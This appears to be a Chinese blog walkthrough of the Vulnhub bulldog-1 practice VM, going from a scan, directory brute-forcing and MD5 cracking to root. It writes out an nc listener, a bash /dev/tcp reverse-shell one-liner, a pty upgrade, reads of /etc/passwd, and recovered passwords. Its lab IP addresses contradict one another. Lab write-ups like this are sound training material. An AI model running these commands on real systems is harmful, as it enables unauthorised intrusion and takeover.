Vulnhub靶场 bulldog-1
目标:
获得root权限和flflag。
运行环境:
靶机:用VirtualBox启动虚机,导入镜像,网络连接方式设置为桥接到无线网卡。靶机启动后,自动获得IP:
172.20.10.7。
Windows攻击机:物理机,连接无线网卡,自动获取IP:172.20.10.5,安装有Burpsuit、nc、Python2.7、
DirBuster等渗透工具。
Kali攻击机:VMWare启动虚机,桥接到无线网卡,自动获取IP:172.20.10.6。攻击机二选一即可。
渗透攻击:
1.使用nmap扫描ip192.168.1.158
2.发现端口开启
那么直接访问这个ip
访问成功
3.没有发现可用信息,进行目录爆破
通过对爆破到的目录进行访问发现了一个登录页面
4.查看dev 页面
5.查看页面源码后发现md5加密的代码
6.进行解码
账号密码:nick--------bulldog
账号密码:sarah-------bulldoglover
7.尝试登录
登录成功
8.发现可以执行命令
开启nc监听
nc -lvnp 6666
Web-shell输入
echo “bash -i >& /dev/tcp/192.168.1.29/6666 0>&1” | bash
等待监听成功
输入:python -c ‘import pty;pty.spawn("/bin/bash")’
反弹交互式shell成功
9.
查看系统用户 cat /etc/passwd
查看那些用户值得关注
进入这些用户cd进入
查看当前目录下的所有文件的详细信息,并且查看所有隐藏文件 ls -al
查看可执行文件中的字符串 strings 可执行文件名 查看密码
执行 Sudo python -c 'import pty;pty.spawn("/bin/bash")'命令
因为sudo只有超级用户才能执行所以会提示输入密码.
输入密码:SUPERultimatePASSWORDyouCANTget
权限提升成功:
补充:
Sodu -i 为了频繁的执行某些只有超级用户才能执行的权限,而不用每次输入密码,可以使用该命令。提示输入密码时该密码为当前账户的密码。没有时间限制。执行该命令后提示符变为“#”而不是“$”。想退回普通账户时可以执行“exit”或“logout” 。
Vulnhub靶场第三关
最新推荐文章于 2023-04-12 22:39:01 发布